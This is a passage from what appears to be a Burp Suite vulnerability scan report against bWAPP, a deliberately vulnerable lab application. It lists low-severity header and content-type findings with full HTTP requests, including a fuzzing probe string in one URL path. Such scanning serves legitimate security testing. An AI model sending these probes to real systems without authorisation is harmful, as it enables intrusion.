    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce067-1d444-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 119876
    Connection: close
    Content-Type: text/plain

    ...........PDSIG#o.}........GDEF.&..........GPOS...........,GSUB-.1........bLTSH^w..........OS/2h}........Vcmap).....N....<cvt F.LQ..\....rfpgm.U.E..U....
    gasp...    ........glyf......c.....hdmx.~a2...`
    ...[SNIP]...
    16.6. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/atommicclock.gdf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/atommicclock.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce061-13018-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 77848
    Connection: close
    Content-Type: text/plain

    ^... .......$...........................................................................................................................................................................................
    ...[SNIP]...
    16.7. http://192.168.52.147/bWAPP/fonts/backlash.gdf
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/backlash.gdf

    Issue detail

    The response states that the content type is text/plain. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11 (Compatibility Mode)

    Request 1

    GET /bWAPP/fonts/backlash.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce063-10b40-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 68416
    Connection: close
    Content-Type: text/plain

    _... .......$...........................................................................................................................................................................................
    ...[SNIP]...
    16.8. http://192.168.52.147/bWAPP/restrict_folder_access.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Issue detail

    The response states that the content type is application/octet-stream. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:
    • Internet Explorer 11
    • Internet Explorer 11 (Compatibility Mode)
    • Edge

    Request 1

    GET /bWAPP/restrict_folder_access.php?file=documents/Iron_Man.pdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/restrict_folder_access.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: 0
    Cache-Control: must-revalidate
    Pragma: public
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=Iron_Man.pdf
    Content-Transfer-Encoding: binary
    Content-Length: 543803
    Connection: close
    Content-Type: application/octet-stream

    %PDF-1.4
    %....
    5 0 obj
    <</Length 6 0 R/Filter /FlateDecode>>
    stream
    x...{.n.U....>w<w.....H:.f.www.~I...`.F...g .+...W..Y.*.B*!..    .0..R.. .I.+..q.....I....D.e..T.'vHP%e..Y......o.1......4s.........u.
    ...[SNIP]...
    17. Metadata in PDF File(s)
    Previous  Next

    There are 6 instances of this issue:

    17.1. http://192.168.52.147/bWAPP/restrict_folder_access.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102011943
    • Parameter: Title. Value: http://www.imdb.com/title/tt0371746/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102011943
    17.2. http://192.168.52.147/bWAPP/restrict_folder_access.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012434
    • Parameter: Title. Value: http://www.imdb.com/title/tt0438488/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012434
    17.3. http://192.168.52.147/bWAPP/restrict_folder_access.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012104
    • Parameter: Title. Value: http://www.imdb.com/title/tt0948470/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012104
    17.4. http://192.168.52.147/bWAPP/restrict_folder_access.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012405
    • Parameter: Title. Value: http://www.imdb.com/title/tt1259521/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012405
    17.5. http://192.168.52.147/bWAPP/restrict_folder_access.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012324
    • Parameter: Title. Value: http://www.imdb.com/title/tt1345836/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012324
    17.6. http://192.168.52.147/bWAPP/restrict_folder_access.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/restrict_folder_access.php

    Note: This issue was generated by the Burp extension: PDF Metadata.

    Issue detail

    PDF Metadata can contain compromising information about employees, software and more. This may provide information leading to specific and targeted technical and social engineering attacks. The PDF file includes the following potentially interesting metadata:

    Document Information

    • Parameter: CreationDate. Value: D:20130102012159
    • Parameter: Title. Value: http://www.imdb.com/title/tt0800080/
    • Parameter: Creator. Value: PScript5.dll Version 5.2.2
    • Parameter: Producer. Value: GPL Ghostscript 8.15
    • Parameter: Author. Value: Malik
    • Parameter: ModDate. Value: D:20130102012159
    18. Content Sniffing not disabled
    Previous  Next

    There are 191 instances of this issue:

    Issue description

    There was no "X-Content-Type-Options" HTTP header with the value nosniff set in the response. The lack of this header causes that certain browsers, try to determine the content type and encoding of the response even when these properties are defined correctly. This can make the web application vulnerable against Cross-Site Scripting (XSS) attacks. E.g. the Internet Explorer and Safari treat responses with the content type text/plain as HTML, if they contain HTML tags.

    18.1. http://192.168.52.147/bWAPP/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Location: portal.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.2. http://192.168.52.147/bWAPP/666
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/666

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/666 HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce0be-70-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 112
    Connection: close
    Content-Type: text/plain

    Hi little bee, how are you today?

    Try to detect this evil 666 page through fuzzing...

    Have fun!

    Cheers, Malik
    18.3. http://192.168.52.147/bWAPP/admin/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3159
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.4. http://192.168.52.147/bWAPP/admin/index.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/index.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/index.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 3159
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.5. http://192.168.52.147/bWAPP/admin/phpinfo.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/php_cgi.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53204

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.6. http://192.168.52.147/bWAPP/admin/phpinfo.php/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:36 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 52584

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.7. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:40 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 53085
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.8. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:44 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 53161
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.9. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:37:57 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53237

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.10. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:38:02 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53313

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.11. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:08 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53389

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.12. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:47:50 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53345

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.13. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:46:35 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53307

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.14. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/
